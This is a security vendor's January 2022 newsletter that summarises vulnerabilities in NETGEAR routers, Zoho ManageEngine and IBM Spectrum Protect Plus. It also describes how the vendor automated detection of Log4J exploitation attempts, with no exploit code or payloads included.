The LogicHub Security Roundup: January 2022 Edition

Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be covering a broad view of this past month’s threats, a series of informative use cases seen this month by our teams, and a series of recommended articles, podcasts, and other useful resources.

HIGHLIGHT

Batch of NETGEAR Vulnerabilities

WHAT DOES IT DO?

NETGEAR routers are popular routers sold for home use. Along with the Nighthawk R6700 gaming router, there were a series of vulnerabilities found for other versions of NETGEAR router firmware, including mishandling of IEEE 1905 protocols, varying remote code execution vulnerabilities, and command injections affecting the device’s update functionality. These vulnerabilities can be found in the National Vulnerability Database.

POTENTIAL IMPACT

Many of these flaws are quite severe and should be carefully reviewed by users of NETGEAR routers. Some potential effects can include full device access, data theft, device manipulation, and possible privilege escalation.

REMEDIATION

Some of these vulnerabilities have been successfully patched, but many for the R6700 have not. Additionally, some of the hardware-related vulnerabilities (such as with MediaTek microchips), may be much more difficult to patch and instead must be mitigated.

MORE INFORMATION:

https://www.bleepingcomputer.com/news/security/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router/

HIGHLIGHT

Zoho ManageEngine Authentication Bypass

WHAT DOES IT DO?

Zoho ManageEngine is a popular IT management solution used by enterprises for desktop, mobile device, general patching, and other management purposes. In this vulnerability, Zoho ManageEngine Desktop Central is specifically affected by an authentication bypass vulnerability that was seen in active exploitation this past December.

POTENTIAL IMPACT

Attackers taking advantage of this vulnerability could gain unintended and unauthorized access to Desktop Central.

REMEDIATION

Several patches have been released to address this issue as of December 3rd. Users affected are urged to patch immediately.

MORE INFORMATION:

https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp

HIGHLIGHT

IBM Spectrum Protect Plus Cross-Origin Resource Sharing

WHAT DOES IT DO?

IBM Spectrum Protect Plus is a popular option for backup and data replication on all manner of data platforms. Cross-origin resource sharing uses HTTP headers to embed images, scripts, and other elements from other domains. This feature was enabled on Spectrum Protect Plus.

POTENTIAL IMPACT

The main problem with cross-origin resource sharing is in its lack of predictability. If the outside domain suddenly serves malware and access control is not properly configured (as in this case), then malware will be served in the requesting application. This can have disastrous effects on users.

REMEDIATION
MORE INFORMATION:

https://exchange.xforce.ibmcloud.com/vulnerabilities/214956

Additional Threats

Description

CUSTOMER USE CASE

Log4J Automation and Response

SUMMARY

Log4J was a major exercise in patience for every network admin, security engineer, and response team, and we were certainly no different. Though we faced our hardships in producing an effective solution for Log4J, we can comfortably speak on some of the difficulties we witnessed. Besides the typical ‘spray and pray’ attempts on random servers across the web, we also witnessed widespread targeted pentest usage of Log4J crafted strings by attackers. Thankfully, due to our automation below, we were able to keep a close eye on clients and maintain an effective security posture.

AUTOMATED SOLUTION

The first step in any automated solution is to identify the signatures of the problem (in this case, a lot of LDAP activity and successful traffic out to domains requested in crafted strings), implement careful monitoring (we chose to link into some IP reputation checks, log pulls from different client sources to cross-reference, and case/alert creation upon discovery of successful data transfer), and ensure that the solution is tuned to satisfaction (lots of tuning towards different fuzzing methods was implemented). After assigning scoring based on severity and creating the cases, manual triage was performed. The fact that there were a comfortable number of cases for our MDR to manually triage signaled that our automation was (and continues to be) a massive success.

BENEFITS TO THIS APPROACH

As with any automation that addresses a fast-growing problem, there has to be a careful balance between speed and effectiveness. Even then, the amount of time and energy spent on producing this automation is miniscule compared to the heavy workload that would have awaited manual review of every log collector’s Log4J detections, especially without the ability to cross-reference between sources. Because of the speed of this automation, we were able to alert concerned clients to possible malicious attempts in a timely manner.

Recommended Reading

This section contains some interesting reading related to the state of infosec today. These articles have a simple summary that explains the basic idea of the news and links to more information.

Submit